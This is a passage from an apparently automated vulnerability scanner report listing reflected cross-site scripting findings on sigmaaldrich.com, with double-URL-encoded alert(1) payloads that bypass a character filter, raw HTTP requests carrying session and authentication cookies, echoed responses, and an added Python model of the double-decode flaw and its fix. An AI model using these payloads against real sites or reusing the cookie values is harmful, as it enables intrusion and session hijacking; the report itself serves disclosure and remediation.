                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-scienceffa01";alert(1)//e7437acb32f/cell-culture.html","E404") ;
   </script>
...[SNIP]...

1.534. http://www.sigmaaldrich.com/life-science/cell-culture.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/cell-culture.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97e93%2522%253balert%25281%2529%252f%252f25b8e28cfa6 was submitted in the REST URL parameter 2. This input was echoed as 97e93";alert(1)//25b8e28cfa6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
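
The issue and remediation text repeated for findings 1.527 through 1.534 describes the same defect each time: the web server URL-decodes the path once, the application decodes it a second time after its character filter has already run, and the result is written unescaped into the double-quoted string passed to cmCreateErrorTag(). The Python model below is an added example, not code from the scanned site or from the scanner. The blocked character set, the handler structure and the function names are assumptions; the payload, origin and sink are taken from finding 1.527. It shows why the double-encoded payload passes the filter and how a handler that decodes once, validates the canonical value and encodes for the JavaScript-string context closes the hole.

```python
"""Model of the double-URL-decode flaw behind findings 1.527-1.534 and its fix.

Added example, not code from the scanned site or from the scanner. The
blocked character set and the handler structure are assumptions; the payload,
origin and sink are taken from finding 1.527.
"""
from typing import Optional
from urllib.parse import unquote

# Assumption: the application's filter rejects these characters in the path
# value it receives, i.e. after the web server's single URL-decode.
BLOCKED = set('"\'<>;')

# Request-line path from finding 1.527: the payload is double-encoded
# (%2522 -> %22 -> ").
PAYLOAD_PATH = "/jsbf5ee%2522%253balert%25281%2529%252f%252f0adfcf5682a/sigma_functions.js"
ORIGIN = "http://www.sigmaaldrich.com:4402"
TEMPLATE = 'cmCreateErrorTag("Error 404 | %s%s","E404") ;'


def web_server_decode(raw_path: str) -> str:
    """First decode, performed by the HTTP server before the app sees the path."""
    return unquote(raw_path)


def passes_filter(value: str) -> bool:
    return not (BLOCKED & set(value))


def vulnerable_handler(raw_path: str) -> Optional[str]:
    """Validate, then canonicalise again: the order the report describes.

    Returns the generated script statement, or None if the filter rejected it.
    """
    path = web_server_decode(raw_path)
    if not passes_filter(path):          # sees %22 rather than ", so it passes
        return None
    path = unquote(path)                 # redundant second decode: %22 -> "
    return TEMPLATE % (ORIGIN, path)     # the " now terminates the JS string


def _utf16_units(ch: str):
    cp = ord(ch)
    if cp < 0x10000:
        return (cp,)
    cp -= 0x10000
    return (0xD800 + (cp >> 10), 0xDC00 + (cp & 0x3FF))


def js_string_escape(value: str) -> str:
    """Encode for a JavaScript string literal: every character outside
    [A-Za-z0-9] becomes \\uXXXX, so neither a quote nor </script> survives."""
    out = []
    for ch in value:
        if ch.isascii() and ch.isalnum():
            out.append(ch)
        else:
            out.extend("\\u%04x" % unit for unit in _utf16_units(ch))
    return "".join(out)


def hardened_handler(raw_path: str) -> Optional[str]:
    """Canonicalise once, validate the canonical value, encode for the sink."""
    path = web_server_decode(raw_path)   # the only decode
    if not passes_filter(path):
        return None
    # If a second decode had to be kept, validation would have to run on its
    # output: passes_filter(unquote(path)) is False for this payload.
    return TEMPLATE % (ORIGIN, js_string_escape(path))


if __name__ == "__main__":
    print("vulnerable:", vulnerable_handler(PAYLOAD_PATH))
    print("hardened:  ", hardened_handler(PAYLOAD_PATH))
```

Run it and compare the two lines: the vulnerable handler reproduces the echoed statement from the response body verbatim, while the hardened one keeps the reflected path inside the string literal even if the filter's character set is wrong, because the output encoding, not the blocklist, is what prevents the breakout. Validating the once-decoded value is still worth keeping to reject junk paths early, but it must never run on a value that is decoded again afterwards.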

Request

GET /life-science/97e93%2522%253balert%25281%2529%252f%252f25b8e28cfa6 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:27 GMT
Content-Length: 28917
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science/97e93";alert(1)//25b8e28cfa6","E404") ;
   </script>
...[SNIP]...

1.535. http://www.sigmaaldrich.com/life-science/core-bioreagents.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/core-bioreagents.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a00d4%2522%253balert%25281%2529%252f%252f55377115b5 was submitted in the REST URL parameter 1. This input was echoed as a00d4";alert(1)//55377115b5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-sciencea00d4%2522%253balert%25281%2529%252f%252f55377115b5/core-bioreagents.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:25 GMT
Content-Length: 28937
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-sciencea00d4";alert(1)//55377115b5/core-bioreagents.html","E404") ;
   </script>
...[SNIP]...

1.536. http://www.sigmaaldrich.com/life-science/core-bioreagents.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/core-bioreagents.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54f66%2522%253balert%25281%2529%252f%252ff8e1dc82aa8 was submitted in the REST URL parameter 2. This input was echoed as 54f66";alert(1)//f8e1dc82aa8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science/54f66%2522%253balert%25281%2529%252f%252ff8e1dc82aa8 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:27 GMT
Content-Length: 28917
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science/54f66";alert(1)//f8e1dc82aa8","E404") ;
   </script>
...[SNIP]...

1.537. http://www.sigmaaldrich.com/life-science/custom-oligos.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/custom-oligos.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c50ab%2522%253balert%25281%2529%252f%252fa5d314c50df was submitted in the REST URL parameter 1. This input was echoed as c50ab";alert(1)//a5d314c50df in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-sciencec50ab%2522%253balert%25281%2529%252f%252fa5d314c50df/custom-oligos.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:28 GMT
Content-Length: 28935
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-sciencec50ab";alert(1)//a5d314c50df/custom-oligos.html","E404") ;
   </script>
...[SNIP]...

1.538. http://www.sigmaaldrich.com/life-science/custom-oligos.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/custom-oligos.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20420%2522%253balert%25281%2529%252f%252f86b2e897c21 was submitted in the REST URL parameter 2. This input was echoed as 20420";alert(1)//86b2e897c21 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science/20420%2522%253balert%25281%2529%252f%252f86b2e897c21 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
